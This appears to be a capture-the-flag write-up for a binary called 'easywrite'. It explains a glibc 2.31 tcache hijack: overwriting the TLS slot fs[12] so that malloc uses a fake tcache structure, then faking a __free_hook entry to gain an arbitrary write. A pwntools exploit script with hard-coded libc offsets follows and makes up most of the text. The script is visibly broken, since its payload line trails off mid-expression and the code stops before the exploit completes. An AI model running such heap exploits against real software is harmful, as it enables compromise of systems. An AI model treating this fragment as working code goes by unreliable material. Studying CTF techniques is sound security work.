• The challenge is simple. It provides us with a libc leak at first.
  • Then it does malloc(0x300) and allows us to do an arbitrary heap write anywhere.
  • So I just overwrite fs[12], which stores the tcache structure address.
  • The challenge later does malloc(0x30), writes data to the returned pointer, and frees it.
  • After I overwrote fs[12] (in .tls), when we malloc, glibc takes the pointer we wrote there as the tcache structure, which we control. So I just faked a __free_hook entry and got an AAW primitive.


from pwn import *
from past.builtins import xrange
from time import sleep
import random

# Offsets into libc 2.31, relative to the libc base resolved at runtime.
# These are specific to that libc build and must match the target binary's libc.
__free_hook, tls_tcache, system = (
    0x1eeb28,  # __free_hook
    0x1f34f0,  # TLS slot holding the tcache structure pointer (fs[12])
    0x55410,   # system()
)

if __name__ == '__main__':

	io = process('./easywrite')
#	io = remote('',20000)
	libc_base = int(io.recvline().strip().split(b':')[1],0)-0x8ec50
	__FUK = p64(0x0000000100000000)+p64(0)+\

	io.sendafter('Input your message:',__FUK)

	io.sendafter('Where to write?:',p64(libc_base+tls_tcache))